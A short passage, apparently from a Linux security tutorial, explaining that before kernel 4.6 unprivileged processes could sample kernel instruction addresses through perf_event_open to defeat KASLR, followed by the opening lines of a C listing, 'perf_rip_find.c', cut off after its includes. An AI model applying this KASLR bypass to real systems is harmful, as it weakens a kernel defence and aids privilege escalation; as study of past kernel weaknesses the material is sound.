Before Linux 4.6, the default value of /proc/sys/kernel/perf_event_paranoid was 1, and so any Linux process could sample kernel addresses with perf_event_open's PERF_SAMPLE_IP. So you can break KASLR by sampling the addresses and taking the mininum. Listing 59: perf_rip_find.c/* -*- compile-command: "gcc -Wall perf_rip_find.c -o perf_rip_find" -*- */ #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <stdint.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/syscall...
